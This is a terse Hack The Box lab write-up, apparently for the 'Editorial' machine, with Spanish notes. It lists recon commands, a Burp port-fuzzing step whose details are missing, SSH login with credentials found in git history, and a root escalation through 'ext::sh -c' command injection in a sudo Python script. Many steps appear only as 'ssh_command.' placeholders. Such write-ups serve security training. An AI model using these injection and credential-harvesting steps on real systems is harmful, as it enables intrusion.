Editorial

Editorial

Jul 29, 2024
HTB Linux

nmap -A -p- -oA editorial 10.10.11.20 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA editorial 10.10.11.20

echo "10.10.11.20 editorial.htb" | sudo tee -a /etc/hosts

ssh_command.

nmap -sU -O -p- -oA editorial-udp 10.10.11.20

ping -c 1 10.10.11.20

ssh_command.

nmap -p- --open -T5 -v -n 10.10.11.20

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.20 -oG allPorts

ssh_command.

extractPorts allPorts

ssh_command.

nmap -sCV -p22,80 10.10.11.20 -oN targeted

ssh_command.

bc targeted -l rb

ssh_command.

whatweb http://10.10.11.20

ssh_command.

wfuzz -c --hc=404,400,302 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.11.20/FUZZ

Abrimos burpsuite y nos vamos a http://editorial.htb/upload

ssh_command.

Agregamos un archivo.

ssh_command.

Y vemos la peticion

ssh_command.

Enviar a intruder. Darle click a Add y en la parte de $puerto$

ssh_command.

Vamos a payload y hacemos lo siguiente:

ssh_command.

ssh_command.

ssh_command.

Credenciales-> dev:dev080217_devAPI!@

ssh_command.

ssh dev@10.10.11.20

ssh_command.

cd apps

git log

ssh_command.

git show b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae

Credenciales-> prod:080217_Producti0n_2023!@

ssh_command.

su prod

sudo -l

ssh_command.

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c touch% /tmp/root'

cat /tmp/root

ssh_command.

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c cat% /root/root.txt% >% /tmp/root'

ssh_command.